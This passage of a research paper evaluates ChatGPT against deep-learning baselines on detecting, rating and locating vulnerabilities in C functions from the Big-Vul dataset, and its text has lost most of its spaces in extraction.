understandinputpromptsandinstructions,enhancingperformanceacrossvarioustasks[4,44]. 2.2 SoftwareVulnerability SoftwareVulnerabilities(SVs)canexposesoftwaresystemstorisksituationsandconsequently makethesoftwareundercyber-attacks,eventuallycausinghugeeconomiclossesandeventhreat- eningpeople’slives.Therefore,vulnerabilitydatabaseshavebeencreatedtodocumentandanalyze publicly known security vulnerabilities. For example, Common Vulnerabilities and Exposures (CVE)[5,38]andSecurityFocus[52]aretwowell-knownvulnerabilitydatabases.Besides,Common WeaknessEnumeration(CWE)definesthecommonsoftwareweaknessesofindividualvulnerabili- ties,whichareoftenreferredtoasvulnerabilitytypesofCVEs.Tobetteraddressthesevulnerabilities, ,Vol.1,No.1,Article.Publicationdate:April2024.4 XinYin researchershaveproposedmanyapproachesforunderstandingtheeffectsofsoftwarevulnerabili- ties,includingSVdetection[7,8,11,18,27,34,35,42,55,57,59],SVassessment[17,29,30,39,50], SVlocalization[32,33,40],SVrepair[10,41,58,60]aswellasSVdescription[24–26,51].Many noveltechnologiesareadoptedtopromotetheprogressofsoftwarevulnerabilitymanagement, includingsoftwareanalysis[14,31],machinelearning[27,59],anddeeplearning[32,39],especially largelanguagemodels[24,25,56]. 3 EXPERIMENTALDESIGN Inthissection,wepresentourresearchquestion(RQs),ourstudieddataset,thebaselineap- proaches,andtheevaluationmetrics. 3.1 StudiedDataset Weadoptthewidelyuseddataset(namedBig-Vul)providedbyFanetal.[15]byconsideringthe followingreasons.Themostimportantoneistosatisfythedistinctcharacteristicsoftherealworld aswellasthediversityinthedataset,whichissuggestedbypreviousworks[8,27].Big-Vul,to thebestofourknowledge,isthemostlarge-scalevulnerabilitydatasetwithdiverseinformation aboutthevulnerabilities,whicharecollectedfrompracticalprojectsandthesevulnerabilitiesare recordedintheCommonVulnerabilitiesandExposures(CVE)1.Thesecondoneistocompare fairlywithexistingstate-of-the-art(SOTA)approaches(e.g.,LineVul,Devign).Thethirdoneis Big-Vulistheonlyonevulnerabilitydatasetthatcontainsthefixedversionofvulnerablefunctions, whichcanbeutilizedtoevaluatewhetherChatGPThastheabilitytofixavulnerablefunction. Big-Vul totally contains 3,754 code vulnerabilities collected from 348 open-source projects spanning91differentvulnerabilitytypesfrom2002to2019.Ithas188,636C/C++functionswitha vulnerableratioof5.7%(i.e.,10,900vulnerabilityfunctions).Theauthorslinkedthecodechanges withCVEsandtheirdescriptiveinformationtoenableadeeperanalysisofthevulnerabilities. Theoriginaldatasetcannotbedirectlyusedinourstudy.Therefore,wefiltertheoriginaldataset fromtwoaspects.Firstly,consideringtheinputlengthlimitation(i.e.,4,096tokens)ofChatGPT API,weusethetiktokentool2,afastBPEtokenizerforusewithOpenAI’smodels,tofilterout functionsthatexceed2,000tokensandleavetheremaining2,096tokensastheinputprompt as wellastheoutputoffixedfunctionsofavulnerablefunctiongeneratedbyChatGPT.Secondly,we filterouttheinstanceswhoseCWEIDisrecordedasNaN. Finally,tobetterevaluateChatGPT’sabilityandconsideringthelargeconsumptionofinteraction withChatGPT,weneedtodeterminethenumberofinstances(i.e.,functionsinBig-Vul)inorderto getresults(i.e.,testingdataset)thatreflectthetargetdataset(i.e.,Big-Vul)aspreciselyasneeded. WesamplethetestinginstancesforeachCWEinBig-Vulwith95%confidenceand5%interval3. Eventually,weobtain724vulnerablefunctionsand12,701non-vulnerablefunctionstoconductour study.ThestatisticsareshowninTable2. Table2. Thestatisticofstudieddataset Dataset #Vulnerablities #Non-Vulnerablities %Ratio OriginalBig-Vul 10,900 177,736 1:16.3 FilteredBig-Vul 8,048 142,302 1:17.9 SampledBig-Vul 724 12,701 1:17.5 1https://cve.mitre.org/ 2https://github.com/openai/tiktoken 3https://surveysystem.com/sscalc.htm ,Vol.1,No.1,Article.Publicationdate:April2024.ProsandCons!EvaluatingChatGPTonSoftwareVulnerability 5 3.2 EvaluationMetrics For considered software vulnerability-related tasks, we will perform evaluations using the widelyadoptedperformancemetrics.Forsoftwarevulnerabilitydetectiontasks,metricssuchas Precision,Recall,F1-score,andAccuracyareused[40].Forthesoftwarevulnerabilityassessment, Accuracyisadopted.Forthesoftwarevulnerabilitylocationtask,weadoptthreeperformance metrics:Hit@Accuracy,Precision,andRecall.Forthesoftwarevulnerabilityrepairtask,weuse Hit@Accuracy.Forthesoftwarevulnerabilitydescriptiongenerationtask,weuseRouge-1,Rouge-2, andRouge-Lmetrics. 3.3 Baselines TocomprehensivelycomparetheperformanceofChatGPTwithexistingstate-of-the-art(SOTA) approach,inthisstudy,weconsiderthefourapproaches:Devign[59],ReVeal[8],IVDetect[32], andLineVul[18].Webrieflyintroducethemasfollows. DevignproposedbyZhouetal.[59]isageneralgraphneuralnetwork-basedmodelforgraph-
levelclassificationthroughlearningonarichsetofcodesemanticrepresentationsincludingAST, CFG,DFG,andcodesequences.Itusesanovel𝐶𝑜𝑛𝑣 moduletoefficientlyextractusefulfeaturesin thelearnedrichnoderepresentationsforgraph-levelclassification. ReVealproposedbyChakrabortyetal.[8]containstwomainphases.Inthefeatureextraction phase,ittranslatescodeintoagraphembedding,andinthetrainingphase,ittrainsarepresentation learnerontheextractedfeaturestoobtainamodelthatcandistinguishthevulnerablefunctions fromnon-vulnerableones. IVDetectproposedbyLietal.[32]containsthecoarse-grainedvulnerabilitydetectioncom- ponent and fine-grained interpretation component. In particular, IVDetect represents source code in the form of a program dependence graph (PDG) and treats the vulnerability detection problemasgraph-basedclassificationviagraphconvolutionnetworkwithfeatureattention.As forinterpretation,IVDetectadoptsaGNNExplainertoprovidefine-grainedinterpretationsthat includethesub-graphinPDGwithcrucialstatementsthatarerelevanttothedetectedvulnerability. LineVulproposedbyFuetal.[18]isaTransformer-basedline-levelvulnerabilityprediction approach.LineVulleveragesBERTarchitecturewithself-attentionlayerswhichcancapturelong- termdependencieswithinalongsequence.Besides,benefitingfromthelarge-scalepre-trained model,LineVulcanintrinsicallycapturemorelexicalandlogicalsemanticsforthegivencodeinput. Moreover,LineVuladoptstheattentionmechanismofBERTarchitecturetolocatethevulnerable linesforfiner-graineddetection. 3.4 Implementation WeimplementedexperimentinPythonbywrappingthestate-of-the-artChatGPT[43]model throughitsAPIsupport[9]andadheretothebest-practiceguide[49]foreachprompt.Weutilize thegpt-3.5-turbo-0301modelfromtheChatGPTfamily,whichistheversionuseduniformlyfor ourexperiments.WealsoinstructChatGPTtooutputtheresultsinJSONformattofacilitatethe automaticorganizationofthedata.RegardingReVeal,IVDetect,DevignandLineVul,weutilize theirpubliclyavailablesourcecodeandperformfine-tuningwiththedefaultparametersprovided intheiroriginalcode.ConsideringDevign’scodeisnotpubliclyavailable,wemakeeveryeffort toreplicateitsfunctionalityandachievesimilarresultsontheoriginalpaper’sdataset.Allthese modelsareimplementedusingthePyTorch[45]framework.Theevaluationisconductedona 16-coreworkstationequippedwithanIntel(R)Xeon(R)Gold6226RCPU@2.90Ghz,192GBRAM, runningUbuntu20.04.1LTS. ,Vol.1,No.1,Article.Publicationdate:April2024.6 XinYin 4 EXPERIMENTALRESULTS ThissectionpresentstheexperimentalresultsofChatGPTbyevaluatingChatGPTperformances onthewidelyusedcomprehensivedataset(i.e.,Big-Vul[15]coveringfiveSV-relatedtasks. Table3. ThecomparisonbetweenChatGPTandfourapproachesonsoftwarevulnerabilitydetection Setting Approaches #Testing F1-score Precision Recall Accuracy ChatGPT 13,425 0.106 0.091 0.127 0.884 LineVul 13,425 0.260 0.340 0.210 0.935 Sampled Devign 9,115 0.162 0.094 0.571 0.674 ReVeal 9,115 0.176 0.108 0.487 0.749 IVDetect 9,195 0.181 0.110 0.498 0.741 ChatGPT 0.106 0.091 0.127 0.884 LineVul 13,425 0.260 0.340 0.210 0.935 ChatGPT 0.109 0.091 0.135 0.878 Devign 9,115 0.162 0.094 0.571 0.674 GPT&EB ChatGPT 0.109 0.091 0.135 0.878 ReVeal 9,115 0.176 0.108 0.487 0.749 ChatGPT 0.113 0.095 0.138 0.875 IVDetect 9,195 0.181 0.110 0.498 0.741 ChatGPT 0.108 0.090 0.133 0.877 LineVul 0.240 0.350 0.180 0.940 GPT&AB Devign 9,025 0.163 0.095 0.572 0.673 ReVeal 0.176 0.108 0.488 0.746 IVDetect 0.175 0.107 0.484 0.745 “GPT&EB”referstoChatGPT∩EachBaseline. “GPT&AB”referstoChatGPT∩AllBaselines. 4.1 RQ-1:EvaluatingVulnerabilityDetectionofChatGPT InthisRQ,wefirstinvestigatethevulnerabilitydetectionofChatGPTandmakeacomparison withtheexistingstate-of-the-art(SOTA)approaches.Then,wewanttoinvestigatewhetherthe decisionresultsofChatGPTcanbeinducedbyhumaninstructions. RQ-1.1:HowdoesChatGPTperformonvulnerabilitydetectioncomparedtothestate-of-the- artapproaches? ExperimentalSetting.WesampleeachCWEfromtheBig-VuldatasetasintroducedinSection3.1 andadoptthewidelyusedfourperformancemeasures(i.e.,Precision,Recall,F1-score,andAccuracy) forevaluatingtheperformanceofChatGPTondetectingvulnerability.Noticethat,weusethe followinginstructionforthisSVdetectiontask. Prompt1.1:Iwantyoutoactasavulnerabilityscanner.IwillprovideyouaCcodesnippet andwantyoutotellwhetherithasavulnerability.Youneedtooutput“yes”or“no”first(output noifuncertain),andthenexplain. Moreover,tobetterunderstandtheperformancedifferencebetweenChatGPTandSOTAsoftware vulnerabilitydetectionapproaches,wetotallyconsiderfourapproacheswhichcanbedividedinto two groups: transformer-based (LineVul) and graph-based (Devign, ReVeal, IVdetect). Besides, graph-basedapproachesneedtoobtainthestructureinformation(e.g.,controlflowgraph(CFG),
,Vol.1,No.1,Article.Publicationdate:April2024.ProsandCons!EvaluatingChatGPTonSoftwareVulnerability 7 dataflowgraph(DFG))ofthestudiedfunctions,soweadoptthesametoolkitwithJoern[1]to transformsampledfunctions.Thefunctionsaredroppedoutdirectlyiftheycannotbetransformed byJoernsuccessfully.Finally,wefine-tunethefourSOTAsontheremainingdatasetofBig-Vul aftersamplingtheinstancesfortesting.Thatis,werefertoBig-Vulas𝐷 andthesampleddataset from𝐷 isreferredtoas𝑆,thereforethedifferencebetween𝐷 and𝑆 isusedtofine-tunethefour approaches. Besides,consideringthedifferenceinthetestingsizeofeachapproach,weshowthethreetypesof settingswhencomparingChatGPTandbaselines:(1)Sampled meansevaluatingeachapproachon thesampledfunctionsthatcanbesuccessfullyanalyzed;(2)IntersectionbetweenChatGPTandeach baseline(ChatGPT∩EachBaseline)meansevaluatingtheperformancedifferencebetweenChatGPT andeachbaselineontheintersectionofthetwoapproaches’testingdataset;(3)Intersectionamong ChatGPTandallbaselines(ChatGPT∩AllBaselines)meansevaluatingtheperformancedifference amongChatGPTandallbaselineontheintersectionofallapproaches’testingdataset. Apartfrompresentingtheoverallperformancecomparison,wealsogivethedetailedperformance of ChatGPT on the Top-10 CWE types in the testing dataset for a better analysis as shown in Table.4. Table4. ThesoftwarevulnerabilitydetectionperformancecomparisonbetweenChatGPTandfourbaselines ChatGPT LineVul Devign ReVeal IVDetect ChatGPT LineVul Devign ReVeal IVDetect CWEType #Sampled #Vulnerability F1-score Precision CWE-125 305 16 0.06 0.23 0.17 0.19 0.29 0.05 0.30 0.10 0.11 0.18 CWE-476 302 13 0.19 0.10 0.10 0.14 0.08 0.17 0.14 0.06 0.08 0.05 CWE-189 248 11 0.06 0.21 0.11 0.18 0.25 0.04 0.25 0.06 0.11 0.15 CWE-200 231 10 0.00 0.13 0.17 0.14 0.18 0.00 0.20 0.10 0.09 0.11 CWE-119 221 9 0.08 0.43 0.15 0.18 0.25 0.07 0.60 0.08 0.10 0.15 CWE-264 216 9 0.16 0.00 0.03 0.11 0.10 0.12 0.00 0.02 0.06 0.06 CWE-362 212 10 0.21 0.00 0.13 0.27 0.27 0.17 0.00 0.08 0.17 0.17 CWE-20 172 7 0.00 0.31 0.10 0.18 0.12 0.00 0.33 0.06 0.12 0.07 CWE-399 168 11 0.00 0.14 0.19 0.13 0.14 0.00 0.33 0.12 0.09 0.09 CWE-416 162 10 0.00 0.00 0.18 0.15 0.17 0.00 0.00 0.12 0.10 0.12 ChatGPT LineVul Devign ReVeal IVDetect ChatGPT LineVul Devign ReVeal IVDetect CWEType #Sampled #Vulnerability Recall Accuracy CWE-125 305 16 0.06 0.19 0.56 0.69 0.88 0.89 0.93 0.70 0.69 0.78 CWE-476 302 13 0.23 0.08 0.38 0.54 0.23 0.92 0.94 0.70 0.72 0.78 CWE-189 248 11 0.09 0.18 0.45 0.55 0.73 0.87 0.94 0.67 0.78 0.80 CWE-200 231 10 0.00 0.10 0.70 0.40 0.50 0.88 0.94 0.70 0.79 0.81 CWE-119 221 9 0.11 0.33 0.67 0.67 0.78 0.90 0.96 0.68 0.75 0.81 CWE-264 216 9 0.22 0.00 0.11 0.33 0.33 0.90 0.94 0.74 0.77 0.76 CWE-362 212 10 0.30 0.00 0.40 0.70 0.70 0.90 0.94 0.75 0.82 0.82 CWE-20 172 7 0.00 0.29 0.43 0.43 0.43 0.90 0.95 0.70 0.84 0.73 CWE-399 168 11 0.00 0.09 0.45 0.27 0.27 0.88 0.93 0.74 0.76 0.77 CWE-416 162 10 0.00 0.00 0.40 0.30 0.30 0.86 0.93 0.78 0.79 0.82 Results.Table3showstheoverallperformancemeasuresbetweenChatGPTandfourapproaches andthebestperformancesarehighlightedinbold.Thesecondcolumnliststhenumberoftesting sizesforeachapproachafterpre-processingoperationonthefunction.Noticethat,sinceboth ChatGPTandLineVulhavenorequirementforagivenfunction,theyhavethelargesttestingsize. AsshowninTable3,wecanobtainthefollowingobservations:1)ChatGPThaspoorperformance compared with existing approaches when considering Precision, Recall, and F1-score. 2) As for Accuracy,LineVul(transformer-based)obtainsthebestperformanceandChatGPTrankssecond, which is better than the three graph-based models. 3) As for Precision, we find that ChatGPT performssimilarlytothethreegraph-basedmodels.4)AsforRecall,ChatGPTseemstoperform theworstwithonly13.2%onaverage,andmeanwhile,wefindthatLineVulalsoachievesapoor performanceof19.5%onaverage,whichisfarlessthangraph-basedmodels. Finding-1.ChatGPThastheabilitytodetectsoftwarevulnerabilities.However,theexistingstate- of-the-artapproachesperformbetteroverall. ,Vol.1,No.1,Article.Publicationdate:April2024.8 XinYin Table 4 shows the detailed comparisons of Top-10 CWE types between ChatGPT and four SOTAs. In this table, we highlight the best performance for each performance metric in bold, andtobetterdistinguishtheperformancedifferencebetweenChatGPTandSOTAs,wefillthe cellswithdifferentcolors(i.e., ChatGPT or SOTA).Accordingtotheresults,wecanachieve thefollowingobservations:1)Inmostcases,SOTAsobtainbetterperformancethanChatGPTon allCWEtypesbyconsideringallperformancemetrics.2)Consideringtheperformanceofboth F1-scoreandPrecision,ChatGPTachievesthebestperformances(0.19ofCWE-476and0.16OF
CWE-264),whichindicatesChatGPTisgoodatcheckingthe“NULLPointerDereference” andthe “Permissions,Privileges,andAccessControls”.3)ChatGPTperformsworstonalotofCWEtypes (CWE-200,CWE-20,CWE-399,andCWE-416),whichmeansthatChatGPTalmosthasnoabilityto detectwhetheravulnerablecanexposesensitiveinformationtounauthorizedactors(CWE-200), todetectwhethertheinputisimproper(CWE-20),anddetectwhethertheresourceismanaged correctly(CWE-399andCWE-416). Finding-2.ChatGPTisgoodatcheckingboththe“NULLPointerDereference”(CWE-476)and the“Permissions,Privileges,andAccessControls”(CWE-264)anditdoesbadlyinauthorization checking,resourcemanagement,andinputvalidatecheckingrelatedvulnerabilities(i.e.,CWE-200, CWE-20,CWE-399,andCWE-416). RQ-1.2:HowdoesChatGPTperformonvulnerabilitydetectionwheninducedbyinstruction? ExperimentalSetting.WealsoconductanexperimentonwhetherwecanconfuseChatGPT whendetectingsoftwarevulnerabilities.Thatis,givenavulnerablefunction,wefirstaskChatGPT togiveoutitsdecision.IfChatGPTmakesacorrectclassification(e.g.,non-vulnerable),thenwe willgiveitanotherpromptwiththecontraryconclusion(e.g.,vulnerable)andrecorditsresponse. Forthenon-vulnerablefunctions,weadoptsimilaroperationsonChatGPT.Wewillalsorecord theresponsewhenChatGPTgivesoutawrongclassificationatthefirstjudgment.Forabetter understanding,wepresentaworkflowofinducingChatGPTasshowninFig.2. Forthetwotypesofsettings,wecalculatethefollowingstatisticalinformation: A. CountingthenumberofjudgmentsthatarecorrectlyclassifiedbyChatGPTforeachCWE(i.e.,# Correct). B. CountingthenumberofjudgmentsChatGPTstillremainsconfidentinitsclassificationeven thoughweclearlyinstructChatGPTwiththeoppositecategorizations(i.e.,#Keep).Notethat ChatGPTmayapologizefirstandrequestsmoreinformationbeforeprovidingaspecifictypefor agivenvulnerability,whichstillbeconsideredconfidential. Start Start C. CountingthenumberofjudgmentsthatChatGPTshowsalackofconfidenceafterreceivingan oppositeinstruction(i.e.,#Change). Non-vulnerable Vulnerable code code No Inducing Prompt: Yes vP ur lo nm erp at b: lI es ? No Yes vP ur lo nm erp at b: lI es ? No Vulnerable code Prompt: Is Yes This code vulnerable? has no vulnerability Inducing Prompt: Inducing Prompt: This code End End This code Start Record response End has no vulnerability has a vulnerability Inducing Prompt: Non-vulnerable Prompt: Is No This code Record response Record response code vulnerable? has a vulnerability Yes Fig.2. End End WorkflowofEstimationonInducingChatGPTJudgement ,Vol.1,No.1,Article.Publicationdate:April2024.ProsandCons!EvaluatingChatGPTonSoftwareVulnerability 9 Table5. TheinducedresultsofChatGPTonbothvulnerableandcleanfunctions Setting CWEType #Size #Correct #Keep #Change %Keep %Change CWE-119,CWE-125,CWE-129,CWE-134,CWE-18,CWE-19,CWE- 1∼31 1∼6 0 1∼6 0 100% Vul. 190,CWE-191,CWE-200,CWE-22,CWE-254,CWE-264,CWE-269, CWE-284,CWE-295,CWE-310,CWE-311,CWE-320,CWE-327,CWE- 347,CWE-352,CWE-354,CWE-358,CWE-369,CWE-400,CWE-404, CWE-415,CWE-416,CWE-476,CWE-494,CWE-59,CWE-682,CWE- 704,CWE-74,CWE-754,CWE-755,CWE-77,CWE-78,CWE-787, CWE-79,CWE-834 CWE-399 15 1 1 0 100.0% 0.0% CWE-522,CWE-295,CWE-706,CWE-664,CWE-769,CWE-704,CWE- 3∼363 3∼343 2∼264 1∼95 60%∼95.7% 4.3%∼40% 494,CWE-835,CWE-74,CWE-772,CWE-682,CWE-404,CWE-19, Non-Vul. CWE-415,CWE-320,CWE-134,CWE-264,CWE-284,CWE-369,CWE- 617,CWE-290,CWE-119,CWE-330,CWE-93,CWE-200,CWE-388, CWE-20,CWE-189,CWE-59,CWE-352,CWE-281,CWE-190,CWE- 120,CWE-269,CWE-611,CWE-254,CWE-22,CWE-416,CWE-502, CWE-754,CWE-400,CWE-426,CWE-476,CWE-287,CWE-787,CWE- 310,CWE-674,CWE-834,CWE-399,CWE-79,CWE-732,CWE-311, CWE-16,CWE-94,CWE-358,CWE-601,CWE-89,CWE-665,CWE- 362,CWE-285,CWE-129,CWE-862,CWE-17,CWE-909,CWE-78, CWE-77,CWE-918,CWE-436,CWE-125,CWE-354,CWE-346,CWE- 1021,CWE-361,CWE-693,CWE-172,CWE-90,CWE-770,CWE-255, CWE-191,CWE-532,CWE-18,CWE-347,CWE-755,CWE-668 CWE-327 2 2 2 0 100.0% 0.0% CWE-824 6 6 6 0 100.0% 0.0% CWE-763 7 7 7 0 100.0% 0.0% Results.Table5showthedetailedresultsofChatGPTonvulnerableandnon-vulnerablefunctions respectively when we induce it to change their decisions. In both tables, “Size” represents the sampledsizeforeachtypeofCWE,and“Correct”meansthenumberoffunctionsthatarecorrectly classifiedwhenChatGPTgivesitsfirstdecision.Wealsolistsomestatisticsoftheinducedresults.
That is, “Keep” and “Change” represent the status that ChatGPT keeps its original decision or changestotheoppositedecision,respectively.Noticethat,inbothtables,weonlypresenttheresults whenChatGPTfirstmakesacorrectdecisionandignorestheothers(i.e.,incorrectlyclassifiedthe firsttime). Accordingtotheresults,wecanobtainthefollowingobservations: • ChatGPT can be easily induced to change its decision if we instruct it with an opposite prompt. • Asforvulnerablefunctions,almostallthedecisionsarechangedbyChatGPTforalltypesof CWEwitharatioof100%(exceptforCWE-399),whichmeansChatGPTlosesitsconfidence initsdecision. • Asfornon-vulnerablefunctions,weobtainasimilarconclusionthatChatGPTchangesits decisionafterweinduceitforalmostallCWEswitharatioof4.3%-40.0%(exceptforCWE-327, CWE-824,andCWE-763),whichalsoindicatestheconfidencelossofChatGPTinitsdecision. Finding-3.ChatGPTcanbeeasilyinducedtochangeitsdecision,especiallyonclassifyingvul- nerable functions which indicate ChatGPT lacks confidence in itself abilities on vulnerability detection. 4.2 RQ-2:EvaluatingVulnerabilityAssessmentofChatGPT ExperimentalSetting.WeinstructChatGPTwiththefollowingprompts(i.e.,Prompt2.1and Prompt2.2)totellittoactasavulnerabilityassessor.WefirstprovideChatGPTwiththevulnerable codestoexploreitsperformance(Prompt2.1).Afterthat,weprovideitwithsomekeyimportant information,includingtheCVEdescription,theproject,thecommitmessageaswellasthefile namewhenthevulnerablecodeexiststoinvestigatetheperformancedifferences(Prompt2.2). ,Vol.1,No.1,Article.Publicationdate:April2024.10 XinYin Prompt2.1:IwillprovideyouavulnerableCcodesnippetandyoujustneedtooutputqualitative severityratingsof“Low”,“Medium”,and“High”forCVSSv2.0intheformatSeverity:“Low”or “Medium”or“High”withoutanyexplanation. Prompt2.2:NowIwillprovideyouwithadditionalinformationaboutthisCcodesnippet. Pleasere-outputthequalitativeseverityratingsof“Low”,“Medium”,and“High”forCVSSv2.0 intheformatSeverity:“Low”,“Medium”or“High”withoutanyexplanation. Table6. AvulnerablecodeforChatGPTtoassesswithdifferentprompts ImproperRestrictionofOperationswithintheBoundsofaMemoryBufferVulnerability(CWE-119)inlinux Prompt1 IwillprovideyouavulnerableCcodesnippetandyoujustneedoutputqualitativeseverityratingsof“Low”,“Medium”, and“High”forCVSSv2.0intheformatSeverity:“Low”or“Medium”or“High”withoutanyexplanation. Input1 AnexampleofaCcodesnippetwithvulnerabilities(CVE-2011-2517). Response1 Severity:Medium Prompt2 NowIwillprovideyouwithadditionalinformationaboutthisCcodesnippet.Pleasereoutputthequalitativeseverity ratingsof“Low”,“Medium”,and“High”forCVSSv2.0intheformatSeverity:“Low”or“Medium”or“High”without anyexplanation. Input2 Project:Linux FileName:net/wireless/nl80211.c CVEDescription:Multiplebufferoverflowsinnet/wireless/nl80211.cintheLinuxkernelbefore2.6.39.2allowlocal userstogainprivilegesbyleveragingtheCAP_NET_ADMINcapabilityduringscanoperationswithalongSSIDvalue. CommitMessage:nl80211:fixcheckforvalidSSIDsizeinscanoperations.Inbothtrigger_scanandsched_scan operations,wewerecheckingfortheSSIDlengthbeforeassigningthevaluecorrectly.Sincethememorywasjust kzalloc’ed,thecheckwasalwaysfailingandSSIDwithover32characterswereallowedtogothrough.Thiswascausing abufferoverflowwhencopyingtheactualSSIDtotheproperplace.Thisbughasbeentheresince2.6.29-rc4. Response2 Severity:High Analysis ThetrueSeverityisHigh.Afterprovidingadditionalkeyinformation,ChatGPToutputfortheSeveritychangedfrom MediumtoHigh. Table7. ThesoftwarevulnerabilityassessmentperformanceofChatGPTonTop-10CWEtypes CWEType #Size Accuracy Accuracy 𝑘𝑒𝑦 CWE-119 18 0.06 0.61 CWE-125 22 0.41 0.27 CWE-189 19 0.26 0.58 CWE-20 14 0.21 0.50 CWE-200 18 0.56 0.39 CWE-264 13 0.31 0.38 CWE-362 20 0.35 0.55 CWE-399 14 0.21 0.43 CWE-416 16 0.19 0.38 CWE-476 16 0.31 0.44 Average 170 0.29 0.45 Results.Table7showsthedetailedresultsofChatGPTonvulnerableassessment.“Size”meansthe numberofdetectedvulnerablefunctions.“Accuracy”referstotheprobabilityofChatGPTcorrectly predictingqualitativeseverityratings,while“Accuracy𝑘𝑒𝑦”referstotheprobabilityofChatGPT correctlypredictingqualitativeseverityratingswhenprovidedwithkeyimportantinformation. Notice that, we manually filter out the results that ChatGPT identifies as not containing any vulnerabilities. AsshowninTable7,wecanobtainthefollowingobservations:1)Onaverage,ChatGPThasan accuracyof0.29forpredictingqualitativeseverityratingswhenprovidedwithonlythevulnerable ,Vol.1,No.1,Article.Publicationdate:April2024.ProsandCons!EvaluatingChatGPTonSoftwareVulnerability 11 codesnippet(Prompt2.1).Whengivenadditionalkeyimportantinformation(Prompt2.2),the accuracyincreasesto0.45.ThisdemonstratesthatprovidingmorecontextimprovesChatGPT’s vulnerabilityassessmentcapabilities.2)TheperformanceofChatGPTvariesacrossdifferentCWE
types.2.1PositiveImprovement.ForsomeCWEtypes(e.g.,CWE-119,CWE-189,CWE-20,CWE-399 andCWE-426),theaccuracyimprovessignificantlywhengivenadditionalinformation.Forexample, ChatGPTobtains6%accuracy onlywhengivencodesnippetsonlybut increasesto61%when givenmoreinformationwithanimprovementof10times.2.2NegativeDecrease.ForsomeCWE typessuchasCWE-125andCWE-200,theaccuracydecreases(from0.41to0.27and0.56to0.39, respectively)whenprovidedwiththekeyimportantinformation.ThissuggeststhatChatGPT’s performanceisaffectedbythespecifictypeofvulnerabilitybeingassessed. Finding-4:ChatGPThasthelimitedcapacityforassessmentofvulnerabilityseveritybasedon sourcecodeonly,butcanbeextremelyimprovedifprovidedwithmorecontextinformationinmost cases. ToanalyzewhyChatGPTworkswellforsomeCWEtypesandnotforothers,itisimportantto understandthenaturalnessoftheseCWEtypesandtheadditionalinformationprovidedinthekey importantinformation: Case1:ComplexityofCWEtypes.SomeCWEtypesmightbemorecomplexorchallengingto identifycomparedtoothers.Forexample,CWE-416(UseAfterFree)mightbedifficulttorecognize duetointricatememorymanagementandpointermanipulation,whichcouldexplainthelower accuracy.Ontheotherhand,CWE-119(ImproperRestrictionofOperationswithintheBoundsofa MemoryBuffer)mightbeeasiertoidentifyduetomoreapparentpatternsinthecode,leadingtoa significantimprovementinaccuracywhengivenadditionalinformation. Case2:Qualityofkeyimportantinformation.TheaccuracyofChatGPT’spredictionsisalso affectedbytherelevanceandqualityoftheadditionalkeyimportantinformationprovided.Incases wheretheadditionalinformationisrelevantandspecific,ChatGPT’sperformancemightimprove significantly.However,iftheprovidedinformationisvagueorlesspertinenttothevulnerability type, it might not be helpful or could even degrade the performance, as seen in CWE-125 and CWE-200. Case3:Biasintrainingdata.ChatGPT’strainingdatamaycontainmoreexamplesofcertain vulnerabilitytypes,leadingtobetterperformanceinidentifyingthosetypes.Ifthetrainingdatalacks sufficientexamplesofaspecificCWEtype,ChatGPTmightstruggletorecognizethevulnerabilities andaccuratelypredicttheseverityratingsforthatCWEtype. Case4:Limitationsinunderstandingcode.ChatGPT,whilepowerful,mighthavelimitations inunderstandingtheintricaciesandnuancesofprogramminglanguages,memorymanagement, andotheraspectsofcodeexecution.Asaresult,itmighthavedifficultyidentifyingvulnerabilities that require a deeper understanding of these concepts, such as CWE-416 (Use After Free) and CWE-399(ResourceManagementErrors). Finding5.Despiteimprovementsinaccuracywithmorecontext,ChatGPTstillhaslimitations inaccuratelypredictingseverityratingsforsomeCWEtypes.Thisindicatesthatthereisroom forfurtherenhancementsinChatGPT’svulnerabilityassessmentcapabilitiestoachieveconsistent performanceacrossallvulnerabilitytypes. Finding6.ChatGPT’saccuracyinpredictingqualitativeseverityratingsforvulnerabilitiesin- creasesfrom0.29to0.45whengivenkeyimportantinformation.However,theimprovementvaries acrossdifferentCWEtypes,suggestingthattheChatGPT’sperformanceisaffectedbythespecific vulnerabilitybeingassessed. ,Vol.1,No.1,Article.Publicationdate:April2024.12 XinYin 4.3 RQ-3:EvaluatingVulnerabilityLocationofChatGPT Setting.Weselectthevulnerablefunctionswithinformationonvulnerablelinesfromeachtypeof CWEfortheevaluationandinstructChatGPTwiththefollowingprompttoexploreitsvulnerability locationperformance. Prompt3.1.IwillprovideyouwithaCcodesnippetandyoumustlocatevulnerablelines.First,you needtousetheindextolabeleachlineofcode,andthenpointoutwhichlinesofcodearevulnerable likeVulnerablelines:[1,4,5]. As for a specific vulnerable function, it may contain one or several vulnerable lines of code (𝐿𝑖𝑛𝑒𝑠 𝑔𝑟𝑜𝑢𝑛𝑑),andChatGPTmayalsopredictoneorseveralpotentialones(𝐿𝑖𝑛𝑒𝑠 𝑝𝑟𝑒𝑑𝑖𝑐𝑡).Wecompare 𝐿𝑖𝑛𝑒𝑠 𝑝𝑟𝑒𝑑𝑖𝑐𝑡 to𝐿𝑖𝑛𝑒𝑠 𝑔𝑟𝑜𝑢𝑛𝑑 tocheckwhetherthelineindex𝐿 𝑖 ∈𝐿𝑖𝑛𝑒𝑠 𝑝𝑟𝑒𝑑𝑖𝑐𝑡 belongsto𝐿𝑖𝑛𝑒𝑠 𝑔𝑟𝑜𝑢𝑛𝑑 andwetreatitpredictcorrectlyfortheline𝐿 𝑖 ifitbelongsto,otherwiseitpredictsincorrectly.We alsousethe𝐿𝑖𝑛𝑒𝑠 𝑏𝑜𝑡ℎ torepresenttheintersectionof𝐿𝑖𝑛𝑒𝑠 𝑝𝑟𝑒𝑑𝑖𝑐𝑡 to𝐿𝑖𝑛𝑒𝑠 𝑔𝑟𝑜𝑢𝑛𝑑. TobetterevaluatethevulnerabilitylocationperformanceofChatGPTonaspecificvulnerable function,wegivethefollowingdefinitions: • Hit@AccmeanstheeffectivenessofChatGPTandequals1ifChatGPTcorrectlypredictsat leastonelineofvulnerableline,otheritequals0. • PrecisionindicateshowmanyoftheChatGPT’spredictedvulnerabilitylocationsareactual vulnerabilitylocations.ItisdefinedasPrecision= #Linesboth . #Linespredict • RecallindicateshowmanyactualvulnerabilitylocationsChatGPTcanbecorrectlyfound.Itis definedas:Recall = #Linesboth . #Linesground Forexample,foragivenvulnerablefunction,ittotallyhassixvulnerablelines“[2,3,5,9,14,23]”, andChatGPTgivesoutitspredictionwith10potentiallines“[1,3,5,11,15,16,17,21,22,23]”.Then,we knowthat𝐿𝑖𝑛𝑒𝑠 𝑔𝑟𝑜𝑢𝑛𝑑 